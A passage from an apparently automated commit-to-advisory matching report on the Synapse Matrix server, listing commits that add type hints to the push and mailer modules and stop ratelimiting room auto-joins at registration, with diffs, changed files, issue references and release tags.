Returns:", + "+ The timestamp when we are next allowed to send an email notif", + "+ for this room", + " \"\"\"", + "@@ -279,3 +287,5 @@ class EmailPusher:", + "- async def sent_notif_update_throttle(self, room_id, notified_push_action):", + "+ async def sent_notif_update_throttle(", + "+ self, room_id: str, notified_push_action: dict", + "+ ) -> None:", + " # We have sent a notification, so update the throttle accordingly.", + "@@ -317,3 +327,3 @@ class EmailPusher:", + "- async def send_notification(self, push_actions, reason):", + "+ async def send_notification(self, push_actions: List[dict], reason: dict) -> None:", + " logger.info(\"Sending notif email for user %r\", self.user_id)", + "diff --git a/synapse/push/httppusher.py b/synapse/push/httppusher.py", + "index 6a0ee8274..5408aa129 100644", + "--- a/synapse/push/httppusher.py", + "+++ b/synapse/push/httppusher.py", + "@@ -17,2 +17,3 @@ import logging", + " import urllib.parse", + "+from typing import TYPE_CHECKING, Any, Dict, Iterable, Union", + "@@ -23,5 +24,6 @@ from twisted.internet.error import AlreadyCalled, AlreadyCancelled", + " from synapse.api.constants import EventTypes", + "+from synapse.events import EventBase", + " from synapse.logging import opentracing", + " from synapse.metrics.background_process_metrics import run_as_background_process", + "-from synapse.push import PusherConfigException", + "+from synapse.push import Pusher, PusherConfigException", + " from synapse.types import RoomStreamToken", + "@@ -30,2 +32,5 @@ from . import push_rule_evaluator, push_tools", + "+if TYPE_CHECKING:", + "+ from synapse.app.homeserver import HomeServer", + "+", + " logger = logging.getLogger(__name__)", + "@@ -53,3 +58,3 @@ http_badges_failed_counter = Counter(", + "-class HttpPusher:", + "+class HttpPusher(Pusher):", + " INITIAL_BACKOFF_SEC = 1 # in seconds because that's what Twisted takes", + "@@ -60,13 +65,7 @@ class HttpPusher:", + "- def __init__(self, hs, pusherdict):", + "- self.hs = hs", + "- self.store = self.hs.get_datastore()", + "+ def __init__(self, hs: \"HomeServer\", pusherdict: Dict[str, Any]):", + "+ super().__init__(hs, pusherdict)", + " self.storage = self.hs.get_storage()", + "- self.clock = self.hs.get_clock()", + "- self.state_handler = self.hs.get_state_handler()", + "- self.user_id = pusherdict[\"user_name\"]", + "- self.app_id = pusherdict[\"app_id\"]", + " self.app_display_name = pusherdict[\"app_display_name\"]", + " self.device_display_name = pusherdict[\"device_display_name\"]", + "- self.pushkey = pusherdict[\"pushkey\"]", + " self.pushkey_ts = pusherdict[\"ts\"]", + "@@ -80,9 +79,2 @@ class HttpPusher:", + "- # This is the highest stream ordering we know it's safe to process.", + "- # When new events arrive, we'll be given a window of new events: we", + "- # should honour this rather than just looking for anything higher", + "- # because of potential out-of-order event serialisation. This starts", + "- # off as None though as we don't know any better.", + "- self.max_stream_ordering = None", + "-", + " if \"data\" not in pusherdict:", + "@@ -121,3 +113,3 @@ class HttpPusher:", + "- def on_started(self, should_check_for_notifs):", + "+ def on_started(self, should_check_for_notifs: bool) -> None:", + " \"\"\"Called when this pusher has been started.", + "@@ -125,3 +117,3 @@ class HttpPusher:", + " Args:", + "- should_check_for_notifs (bool): Whether we should immediately", + "+ should_check_for_notifs: Whether we should immediately", + " check for push to send. Set to False only if it's known there", + "@@ -132,3 +124,3 @@ class HttpPusher:", + "- def on_new_notifications(self, max_token: RoomStreamToken):", + "+ def on_new_notifications(self, max_token: RoomStreamToken) -> None:", + " # We just use the minimum stream ordering and ignore the vector clock", + "@@ -143,3 +135,3 @@ class HttpPusher:", + "- def on_new_receipts(self, min_stream_id, max_stream_id):", + "+ def on_new_receipts(self, min_stream_id: int, max_stream_id: int) -> None:", + " # Note that the min here shouldn't be relied upon to be accurate.", + "@@ -150,3 +142,3 @@ class HttpPusher:", + "- async def _update_badge(self):", + "+ async def _update_badge(self) -> None:", + " # XXX as per https://github.com/matrix-org/matrix-doc/issues/2627, this seems", + "@@ -160,6 +152,6 @@ class HttpPusher:", + "- def on_timer(self):", + "+ def on_timer(self) -> None:", + " self._start_processing()", + "- def on_stop(self):", + "+ def on_stop(self) -> None:", + " if self.timed_call:", + "@@ -171,3 +163,3 @@ class HttpPusher:", + "- def _start_processing(self):", + "+ def _start_processing(self) -> None:", + " if self._is_processing:", + "@@ -177,3 +169,3 @@ class HttpPusher:", + "- async def _process(self):", + "+ async def _process(self) -> None:", + " # we should never get here if we are already processing", + "@@ -196,3 +188,3 @@ class HttpPusher:", + "- async def _unsafe_process(self):", + "+ async def _unsafe_process(self) -> None:", + " \"\"\"", + "@@ -204,2 +196,3 @@ class HttpPusher:", + " fn = self.store.get_unread_push_actions_for_user_in_range_for_http", + "+ assert self.max_stream_ordering is not None", + " unprocessed = await fn(", + "@@ -273,3 +266,3 @@ class HttpPusher:", + " self.last_stream_ordering = push_action[\"stream_ordering\"]", + "- pusher_still_exists = await self.store.update_pusher_last_stream_ordering(", + "+ await self.store.update_pusher_last_stream_ordering(", + " self.app_id,", + "@@ -279,7 +272,2 @@ class HttpPusher:", + " )", + "- if not pusher_still_exists:", + "- # The pusher has been deleted while we were processing, so", + "- # lets just stop and return.", + "- self.on_stop()", + "- return", + "@@ -299,3 +287,3 @@ class HttpPusher:", + "- async def _process_one(self, push_action):", + "+ async def _process_one(self, push_action: dict) -> bool:", + " if \"notify\" not in push_action[\"actions\"]:", + "@@ -330,3 +318,5 @@ class HttpPusher:", + "- async def _build_notification_dict(self, event, tweaks, badge):", + "+ async def _build_notification_dict(", + "+ self, event: EventBase, tweaks: Dict[str, bool], badge: int", + "+ ) -> Dict[str, Any]:", + " priority = \"low\"", + "@@ -360,5 +350,3 @@ class HttpPusher:", + "- ctx = await push_tools.get_context_for_event(", + "- self.storage, self.state_handler, event, self.user_id", + "- )", + "+ ctx = await push_tools.get_context_for_event(self.storage, event, self.user_id)", + "@@ -402,3 +390,5 @@ class HttpPusher:", + "- async def dispatch_push(self, event, tweaks, badge):", + "+ async def dispatch_push(", + "+ self, event: EventBase, tweaks: Dict[str, bool], badge: int", + "+ ) -> Union[bool, Iterable[str]]:", + " notification_dict = await self._build_notification_dict(event, tweaks, badge)", + "diff --git a/synapse/push/push_tools.py b/synapse/push/push_tools.py", + "index 6e7c880dc..df3410322 100644", + "--- a/synapse/push/push_tools.py", + "+++ b/synapse/push/push_tools.py", + "@@ -14,2 +14,5 @@", + " # limitations under the License.", + "+from typing import Dict", + "+", + "+from synapse.events import EventBase", + " from synapse.push.presentable_names import calculate_room_name, name_from_member_event", + "@@ -48,3 +51,5 @@ async def get_badge_count(store: DataStore, user_id: str, group_by_room: bool) -", + "-async def get_context_for_event(storage: Storage, state_handler, ev, user_id):", + "+async def get_context_for_event(", + "+ storage: Storage, ev: EventBase, user_id: str", + "+) -> Dict[str, str]:", + " ctx = {}", + "diff --git a/synapse/push/pusher.py b/synapse/push/pusher.py", + "index 2a52e226e..8f1072b09 100644", + "--- a/synapse/push/pusher.py", + "+++ b/synapse/push/pusher.py", + "@@ -16,7 +16,11 @@", + " import logging", + "+from typing import TYPE_CHECKING, Any, Callable, Dict, Optional", + "+from synapse.push import Pusher", + " from synapse.push.emailpusher import EmailPusher", + "+from synapse.push.httppusher import HttpPusher", + " from synapse.push.mailer import Mailer", + "-from .httppusher import HttpPusher", + "+if TYPE_CHECKING:", + "+ from synapse.app.homeserver import HomeServer", + "@@ -26,3 +30,3 @@ logger = logging.getLogger(__name__)", + " class PusherFactory:", + "- def __init__(self, hs):", + "+ def __init__(self, hs: \"HomeServer\"):", + " self.hs = hs", + "@@ -30,3 +34,5 @@ class PusherFactory:", + "- self.pusher_types = {\"http\": HttpPusher}", + "+ self.pusher_types = {", + "+ \"http\": HttpPusher", + "+ } # type: Dict[str, Callable[[HomeServer, dict], Pusher]]", + "@@ -34,3 +40,3 @@ class PusherFactory:", + " if hs.config.email_enable_notifs:", + "- self.mailers = {} # app_name -> Mailer", + "+ self.mailers = {} # type: Dict[str, Mailer]", + "@@ -43,3 +49,3 @@ class PusherFactory:", + "- def create_pusher(self, pusherdict):", + "+ def create_pusher(self, pusherdict: Dict[str, Any]) -> Optional[Pusher]:", + " kind = pusherdict[\"kind\"]", + "@@ -51,3 +57,5 @@ class PusherFactory:", + "- def _create_email_pusher(self, _hs, pusherdict):", + "+ def _create_email_pusher(", + "+ self, _hs: \"HomeServer\", pusherdict: Dict[str, Any]", + "+ ) -> EmailPusher:", + " app_name = self._app_name_from_pusherdict(pusherdict)", + "@@ -64,3 +72,3 @@ class PusherFactory:", + "- def _app_name_from_pusherdict(self, pusherdict):", + "+ def _app_name_from_pusherdict(self, pusherdict: Dict[str, Any]) -> str:", + " data = pusherdict[\"data\"]", + "diff --git a/synapse/push/pusherpool.py b/synapse/push/pusherpool.py", + "index f32596498..9fcc0b8a6 100644", + "--- a/synapse/push/pusherpool.py", + "+++ b/synapse/push/pusherpool.py", + "@@ -17,3 +17,3 @@", + " import logging", + "-from typing import TYPE_CHECKING, Dict, Union", + "+from typing import TYPE_CHECKING, Any, Dict, Optional", + "@@ -25,5 +25,3 @@ from synapse.metrics.background_process_metrics import (", + " )", + "-from synapse.push import PusherConfigException", + "-from synapse.push.emailpusher import EmailPusher", + "-from synapse.push.httppusher import HttpPusher", + "+from synapse.push import Pusher, PusherConfigException", + " from synapse.push.pusher import PusherFactory", + "@@ -79,3 +77,3 @@ class PusherPool:", + " # map from user id to app_id:pushkey to pusher", + "- self.pushers = {} # type: Dict[str, Dict[str, Union[HttpPusher, EmailPusher]]]", + "+ self.pushers = {} # type: Dict[str, Dict[str, Pusher]]", + "@@ -101,3 +99,3 @@ class PusherPool:", + " profile_tag=\"\",", + "- ):", + "+ ) -> Optional[Pusher]:", + " \"\"\"Creates a new pusher and adds it to the pool", + "@@ -105,3 +103,3 @@ class PusherPool:", + " Returns:", + "- EmailPusher|HttpPusher", + "+ The newly created pusher.", + " \"\"\"", + "@@ -269,3 +267,5 @@ class PusherPool:", + "- async def start_pusher_by_id(self, app_id, pushkey, user_id):", + "+ async def start_pusher_by_id(", + "+ self, app_id: str, pushkey: str, user_id: str", + "+ ) -> Optional[Pusher]:", + " \"\"\"Look up the details for the given pusher, and start it", + "@@ -273,9 +273,9 @@ class PusherPool:", + " Returns:", + "- EmailPusher|HttpPusher|None: The pusher started, if any", + "+ The pusher started, if any", + " \"\"\"", + " if not self._should_start_pushers:", + "- return", + "+ return None", + " if not self._pusher_shard_config.should_handle(self._instance_name, user_id):", + "- return", + "+ return None", + "@@ -305,3 +305,3 @@ class PusherPool:", + "- async def _start_pusher(self, pusherdict):", + "+ async def _start_pusher(self, pusherdict: Dict[str, Any]) -> Optional[Pusher]:", + " \"\"\"Start the given pusher", + "@@ -309,6 +309,6 @@ class PusherPool:", + " Args:", + "- pusherdict (dict): dict with the values pulled from the db table", + "+ pusherdict: dict with the values pulled from the db table", + " Returns:", + "- EmailPusher|HttpPusher", + "+ The newly created pusher or None.", + " \"\"\"", + "@@ -317,3 +317,3 @@ class PusherPool:", + " ):", + "- return", + "+ return None", + "@@ -330,3 +330,3 @@ class PusherPool:", + " )", + "- return", + "+ return None", + " except Exception:", + "@@ -335,6 +335,6 @@ class PusherPool:", + " )", + "- return", + "+ return None", + " if not p:", + "- return", + "+ return None" + ], + "changed_files": [ + "changelog.d/8880.misc", + "mypy.ini", + "synapse/push/__init__.py", + "synapse/push/emailpusher.py", + "synapse/push/httppusher.py", + "synapse/push/push_tools.py", + "synapse/push/pusher.py", + "synapse/push/pusherpool.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8880": "Add type hints to the push module. #8901 Convert internal pusher dicts to attrs #8940 Fix handling of stream tokens for push #8943 Fix-up assertions about last stream token in push #9020" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8880, 8880", + "relevance": 32 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8880", + "relevance": 2 + } + ] + }, + { + "commit_id": "1d55c7b56730f0aeb8a620a22d0994f1dc735dfe", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607681869, + "hunks": 11, + "message": "Don't ratelimit autojoining of rooms (#8921) Fixes #8866", + "diff": [ + "diff --git a/changelog.d/8921.bugfix b/changelog.d/8921.bugfix", + "new file mode 100644", + "index 000000000..7f6f0b8a7", + "--- /dev/null", + "+++ b/changelog.d/8921.bugfix", + "@@ -0,0 +1 @@", + "+Fix bug where we ratelimited auto joining of rooms on registration (using `auto_join_rooms` config).", + "diff --git a/synapse/handlers/room.py b/synapse/handlers/room.py", + "index 930047e73..82fb72b38 100644", + "--- a/synapse/handlers/room.py", + "+++ b/synapse/handlers/room.py", + "@@ -442,2 +442,3 @@ class RoomCreationHandler(BaseHandler):", + " creation_content=creation_content,", + "+ ratelimit=False,", + " )", + "@@ -737,2 +738,3 @@ class RoomCreationHandler(BaseHandler):", + " creator_join_profile=creator_join_profile,", + "+ ratelimit=ratelimit,", + " )", + "@@ -840,2 +842,3 @@ class RoomCreationHandler(BaseHandler):", + " creator_join_profile: Optional[JsonDict] = None,", + "+ ratelimit: bool = True,", + " ) -> int:", + "@@ -886,3 +889,3 @@ class RoomCreationHandler(BaseHandler):", + " \"join\",", + "- ratelimit=False,", + "+ ratelimit=ratelimit,", + " content=creator_join_profile,", + "diff --git a/synapse/handlers/room_member.py b/synapse/handlers/room_member.py", + "index c00288632..d85110a35 100644", + "--- a/synapse/handlers/room_member.py", + "+++ b/synapse/handlers/room_member.py", + "@@ -205,3 +205,3 @@ class RoomMemberHandler(metaclass=abc.ABCMeta):", + " # up blocking profile updates.", + "- if newly_joined:", + "+ if newly_joined and ratelimit:", + " time_now_s = self.clock.time()", + "@@ -490,13 +490,16 @@ class RoomMemberHandler(metaclass=abc.ABCMeta):", + " if not is_host_in_room:", + "- time_now_s = self.clock.time()", + "- (", + "- allowed,", + "- time_allowed,", + "- ) = self._join_rate_limiter_remote.can_requester_do_action(requester,)", + "-", + "- if not allowed:", + "- raise LimitExceededError(", + "- retry_after_ms=int(1000 * (time_allowed - time_now_s))", + "+ if ratelimit:", + "+ time_now_s = self.clock.time()", + "+ (", + "+ allowed,", + "+ time_allowed,", + "+ ) = self._join_rate_limiter_remote.can_requester_do_action(", + "+ requester,", + " )", + "+ if not allowed:", + "+ raise LimitExceededError(", + "+ retry_after_ms=int(1000 * (time_allowed - time_now_s))", + "+ )", + "+", + " inviter = await self._get_inviter(target.to_string(), room_id)", + "diff --git a/tests/rest/client/v1/test_rooms.py b/tests/rest/client/v1/test_rooms.py", + "index e67de41c1..55d872f0e 100644", + "--- a/tests/rest/client/v1/test_rooms.py", + "+++ b/tests/rest/client/v1/test_rooms.py", + "@@ -28,2 +28,3 @@ from synapse.api.constants import EventContentFields, EventTypes, Membership", + " from synapse.handlers.pagination import PurgeStatus", + "+from synapse.rest import admin", + " from synapse.rest.client.v1 import directory, login, profile, room", + "@@ -627,2 +628,3 @@ class RoomJoinRatelimitTestCase(RoomBase):", + " servlets = [", + "+ admin.register_servlets,", + " profile.register_servlets,", + "@@ -705,2 +707,16 @@ class RoomJoinRatelimitTestCase(RoomBase):", + "+ @unittest.override_config(", + "+ {", + "+ \"rc_joins\": {\"local\": {\"per_second\": 0.5, \"burst_count\": 3}},", + "+ \"auto_join_rooms\": [\"#room:red\", \"#room2:red\", \"#room3:red\", \"#room4:red\"],", + "+ \"autocreate_auto_join_rooms\": True,", + "+ },", + "+ )", + "+ def test_autojoin_rooms(self):", + "+ user_id = self.register_user(\"testuser\", \"password\")", + "+", + "+ # Check that the new user successfully joined the four rooms", + "+ rooms = self.get_success(self.hs.get_datastore().get_rooms_for_user(user_id))", + "+ self.assertEqual(len(rooms), 4)", + "+" + ], + "changed_files": [ + "changelog.d/8921.bugfix", + "synapse/handlers/room.py", + "synapse/handlers/room_member.py", + "tests/rest/client/v1/test_rooms.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8921": "", + "8866": "Don't ratelimit autojoining of rooms #8921" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8921, 8921", + "relevance": 32 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8921, 8866", + "relevance": 2 + } + ] + }, + { + "commit_id": "02e588856ae26865cd407dd6302aa3deecffe198", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607343022, + "hunks": 37, + "message": "Add type hints to the push mailer module. (#8882)", + "diff": [ + "diff --git a/changelog.d/8882.misc b/changelog.d/8882.misc", + "new file mode 100644", + "index 000000000..4ff0b94b9", + "--- /dev/null", + "+++ b/changelog.d/8882.misc", + "@@ -0,0 +1 @@", + "+Add type hints to push module.", + "diff --git a/mypy.ini b/mypy.ini", + "index 3c8d30306..7ee0dd4b3 100644", + "--- a/mypy.ini", + "+++ b/mypy.ini", + "@@ -57,2 +57,3 @@ files =", + " synapse/notifier.py,", + "+ synapse/push/mailer.py,", + " synapse/push/pusherpool.py,", + "diff --git a/synapse/push/mailer.py b/synapse/push/mailer.py", + "index 38195c8ee..9ff092e8b 100644", + "--- a/synapse/push/mailer.py", + "+++ b/synapse/push/mailer.py", + "@@ -21,3 +21,3 @@ from email.mime.multipart import MIMEMultipart", + " from email.mime.text import MIMEText", + "-from typing import Iterable, List, TypeVar", + "+from typing import TYPE_CHECKING, Any, Dict, Iterable, List, Optional, TypeVar", + "@@ -29,2 +29,3 @@ from synapse.api.errors import StoreError", + " from synapse.config.emailconfig import EmailSubjectConfig", + "+from synapse.events import EventBase", + " from synapse.logging.context import make_deferred_yieldable", + "@@ -35,3 +36,3 @@ from synapse.push.presentable_names import (", + " )", + "-from synapse.types import UserID", + "+from synapse.types import StateMap, UserID", + " from synapse.util.async_helpers import concurrently_execute", + "@@ -39,2 +40,5 @@ from synapse.visibility import filter_events_for_client", + "+if TYPE_CHECKING:", + "+ from synapse.app.homeserver import HomeServer", + "+", + " logger = logging.getLogger(__name__)", + "@@ -95,3 +99,9 @@ ALLOWED_ATTRS = {", + " class Mailer:", + "- def __init__(self, hs, app_name, template_html, template_text):", + "+ def __init__(", + "+ self,", + "+ hs: \"HomeServer\",", + "+ app_name: str,", + "+ template_html: jinja2.Template,", + "+ template_text: jinja2.Template,", + "+ ):", + " self.hs = hs", + "@@ -110,3 +120,5 @@ class Mailer:", + "- async def send_password_reset_mail(self, email_address, token, client_secret, sid):", + "+ async def send_password_reset_mail(", + "+ self, email_address: str, token: str, client_secret: str, sid: str", + "+ ) -> None:", + " \"\"\"Send an email with a password reset link to a user", + "@@ -114,9 +126,9 @@ class Mailer:", + " Args:", + "- email_address (str): Email address we're sending the password", + "+ email_address: Email address we're sending the password", + " reset to", + "- token (str): Unique token generated by the server to verify", + "+ token: Unique token generated by the server to verify", + " the email was received", + "- client_secret (str): Unique token generated by the client to", + "+ client_secret: Unique token generated by the client to", + " group together multiple email sending attempts", + "- sid (str): The generated session ID", + "+ sid: The generated session ID", + " \"\"\"", + "@@ -138,3 +150,5 @@ class Mailer:", + "- async def send_registration_mail(self, email_address, token, client_secret, sid):", + "+ async def send_registration_mail(", + "+ self, email_address: str, token: str, client_secret: str, sid: str", + "+ ) -> None:", + " \"\"\"Send an email with a registration confirmation link to a user", + "@@ -142,9 +156,9 @@ class Mailer:", + " Args:", + "- email_address (str): Email address we're sending the registration", + "+ email_address: Email address we're sending the registration", + " link to", + "- token (str): Unique token generated by the server to verify", + "+ token: Unique token generated by the server to verify", + " the email was received", + "- client_secret (str): Unique token generated by the client to", + "+ client_secret: Unique token generated by the client to", + " group together multiple email sending attempts", + "- sid (str): The generated session ID", + "+ sid: The generated session ID", + " \"\"\"", + "@@ -166,3 +180,5 @@ class Mailer:", + "- async def send_add_threepid_mail(self, email_address, token, client_secret, sid):", + "+ async def send_add_threepid_mail(", + "+ self, email_address: str, token: str, client_secret: str, sid: str", + "+ ) -> None:", + " \"\"\"Send an email with a validation link to a user for adding a 3pid to their account", + "@@ -170,10 +186,10 @@ class Mailer:", + " Args:", + "- email_address (str): Email address we're sending the 